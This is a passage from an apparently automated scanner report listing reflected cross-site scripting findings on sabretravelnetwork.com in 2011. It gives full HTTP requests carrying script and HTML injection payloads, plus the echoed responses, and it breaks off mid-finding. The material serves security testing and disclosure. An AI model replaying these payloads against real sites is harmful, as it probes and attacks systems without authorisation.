<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif87d0d"><a>7693b842da8">
...[SNIP]...

4.387. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b15cd"><a>deef725b16f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif?b15cd"><a>deef725b16f=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:01:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621673; expires=Tue, 02-Oct-2012 01:01:13 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:01:14 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif?b15cd"><a>deef725b16f=1">
...[SNIP]...

4.388. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0230<a>e4b2ad84e07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif?e0230<a>e4b2ad84e07=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:01:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621687; expires=Tue, 02-Oct-2012 01:01:27 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:01:27 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13812


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>e4b2ad84e07=1">loadingAnimation.gif?e0230<a>e4b2ad84e07=1</a>
...[SNIP]...

4.389. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 269d3<a>fe432cfa2bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C269d3<a>fe432cfa2bd/script%3Efb97ed1345c/search/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621574; expires=Tue, 02-Oct-2012 00:59:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:34 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13678


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>fe432cfa2bd">home83d87%22%3E%3Cscript%3Ealert(1)%3C269d3<a>fe432cfa2bd</a>
...[SNIP]...

4.390. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1f32"><script>alert(1)</script>8d4d416ae6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3Cc1f32"><script>alert(1)</script>8d4d416ae6e/script%3Efb97ed1345c/search/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621574; expires=Tue, 02-Oct-2012 00:59:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:34 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13910


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home83d87%22%3E%3Cscript%3Ealert(1)%3Cc1f32"><script>alert(1)</script>8d4d416ae6e/script%3Efb97ed1345c">
...[SNIP]...

4.391. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c59c5<a>0764d9cc01e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345cc59c5<a>0764d9cc01e/search/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621582; expires=Tue, 02-Oct-2012 00:59:42 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:42 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13659


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>0764d9cc01e">script%3Efb97ed1345cc59c5<a>0764d9cc01e</a>
...[SNIP]...

4.392. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 411b4"><script>alert(1)</script>5f460895727 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c411b4"><script>alert(1)</script>5f460895727/search/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621582; expires=Tue, 02-Oct-2012 00:59:42 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:42 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c411b4"><script>alert(1)</script>5f460895727/search">
...[SNIP]...

4.393. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3db33<a>cec1ced26c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search3db33<a>cec1ced26c5/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621591; expires=Tue, 02-Oct-2012 00:59:51 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:51 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13640


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>cec1ced26c5">search3db33<a>cec1ced26c5</a>
...[SNIP]...

4.394. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4601"><script>alert(1)</script>6817d4ebd37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/searche4601"><script>alert(1)</script>6817d4ebd37/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621590; expires=Tue, 02-Oct-2012 00:59:50 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:51 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13852


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/searche4601"><script>alert(1)</script>6817d4ebd37/images">
...[SNIP]...

4.395. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
